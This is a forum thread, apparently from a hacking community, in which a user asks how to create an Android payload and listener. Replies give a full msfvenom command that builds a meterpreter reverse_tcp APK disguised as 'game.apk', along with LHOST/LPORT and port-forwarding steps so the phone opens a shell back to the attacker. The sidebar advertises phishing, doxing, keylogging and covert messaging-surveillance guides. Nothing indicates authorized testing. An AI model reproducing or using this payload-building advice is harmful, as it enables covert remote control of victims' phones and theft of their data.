i have tried multiple times to make a payload but i dont think im doing it right, everytime i create a listener in msfconsole, it doesnt work so i was wondering how exactly do you make an android payload. Should i use reverse_tcp, http or https and once created how exactly do i make a listener for this payload
Forum Thread: How Do I Make an Android Payload
- Hot
- Active
-
Metasploit Error: Handler Failed to Bind 40 Replies
5 days ago -
Forum Thread: How to Know if You Are a Script Kiddie? 9 Replies
1 wk ago -
Forum Thread: How to Identify and Crack Hashes 8 Replies
1 wk ago -
Forum Thread: How to Hack School Website 8 Replies
2 wks ago -
Forum Thread: Whenever I Try "Airmon-Ng Start wlan0" There's an Error? 16 Replies
2 wks ago -
Forum Thread: How to Fix 'Failed to Detect and Mount CD-ROM' Problem When Installing Kali Linux 14 Replies
2 wks ago -
Forum Thread: Awesome Keylogging Script - BeeLogger 30 Replies
3 wks ago -
Forum Thread: How to Hack Android Phone Using Same Wifi 27 Replies
3 wks ago -
Forum Thread: Complete Guide to Creating and Hosting a Phishing Page for Beginners 48 Replies
3 wks ago -
Forum Thread: Create and Use Android/Meterpreter/reverse_tcp APK with Msfvenom? 121 Replies
1 mo ago -
How to: Minecraft DoS'Ing with Python. 1 Replies
2 mo ago -
Forum Thread: HELP I Created an Apk for Hacking My Phone Using Kali Linux in Virtual Box How Can I Install That Apk on My Phone 17 Replies
2 mo ago -
Forum Thread: Tools for Beginner Hacker 3 Replies
2 mo ago -
Forum Thread: How to Embed an Android Payload in an Image? 9 Replies
2 mo ago -
Forum Thread: Metasploit reverse_tcp Handler Problem 46 Replies
3 mo ago -
Forum Thread: HACK ANDROID with KALI USING PORT FORWARDING(portmap.io) 11 Replies
3 mo ago -
Forum Thread: Fix Initramfs Problem 5 Replies
3 mo ago -
Forum Thread: Kali Wont Start, Stuck at Kali Login: 21 Replies
4 mo ago -
Forum Thread: How to View Your Child's What's App And Many More! 3 Replies
4 mo ago -
Forum Thread: Proxy Lists for Proxy Chains 1 Replies
5 mo ago
-
How To: Find Vulnerable Webcams Across the Globe Using Shodan
-
How To: Top 10 Things to Do After Installing Kali Linux
-
How To: Crack Shadow Hashes After Getting Root on a Linux System
-
How To: Gain SSH Access to Servers by Brute-Forcing Credentials
-
How To: Use Burp & FoxyProxy to Easily Switch Between Proxy Settings
-
How To: Scan for Vulnerabilities on Any Website Using Nikto
-
How To: Dox Anyone
-
How to Hack Wi-Fi: Stealing Wi-Fi Passwords with an Evil Twin Attack
-
How To: Find Identifying Information from a Phone Number Using OSINT Tools
-
How To: Brute-Force Nearly Any Website Login with Hatch
-
How To: Upgrade a Dumb Shell to a Fully Interactive Shell for More Flexibility
-
How To: Automate Wi-Fi Hacking with Wifite2
-
How To: Scan, Fake & Attack Wi-Fi Networks with the ESP8266-Based WiFi Deauther
-
How To: Check if Your Wireless Network Adapter Supports Monitor Mode & Packet Injection
-
How To: Manually Exploit EternalBlue on Windows Server Using MS17-010 Python Exploit
-
How To: Enumerate SMB with Enum4linux & Smbclient
-
How To: Perform Advanced Man-in-the-Middle Attacks with Xerosploit
-
How To: Target Bluetooth Devices with Bettercap
-
How To: Extract Bitcoin Wallet Addresses & Balances from Websites with SpiderFoot CLI
-
Hack Like a Pro: Windows CMD Remote Commands for the Aspiring Hacker, Part 1
11 Responses
I am gonna assume you are using msfvenom. Once you generate the payload, you must port forward and specify your IP in the payload.
In order to port forward you have to go into your router configuration page and select port forward. This will vary from router to router, but you port forward your internal IP for msf. And for specifying your IP, you will need your external IP and type: LHOST=IP and the port would be LPORT=4444 or whatever you want the port to be along with msfvenom.
For a reference, check out this link.
Happy hacking!
Cheers!
Hey buddy,
You can create an Android payload using a msfvenom in kali Linux
Fire up the terminal and type
msfvenom - p android/meterpreter/reverse_tcp LHOST=Your local IP address LPORT=4444 R > game.apk
You can use your own application name in the game.apk and for Android you should use .apk extension
And press enter your payload will be generated in the /root/home
LHOST is the local IP address of your machine which you can find in Ifconfig command
LPORT = 4444,6969,9696 whatever you want the port to be with the msfvenom :)
Cheers!
I have done as same as you tell but my termuax app show the msg command not found please help
hey!
what ip to use while doing it on mobile hotspot i mean how can i get a stable external ip? any idea
type # ifconfig in the terminal and see you're local ip address
Is it necessary to make a .apk payload, can't we make .pdf or something else??
no you can't because the apk need a premessions that allows you to hack the phone
thanks for the replies but i have followed these steps and a part which is supposed to say starting the payload handler is not showing
I have done as same as you tell but my termuax app show the msg command not found please help
it's msf not msg
My payload apk unable to install on any android device give some help pls
Share Your Thoughts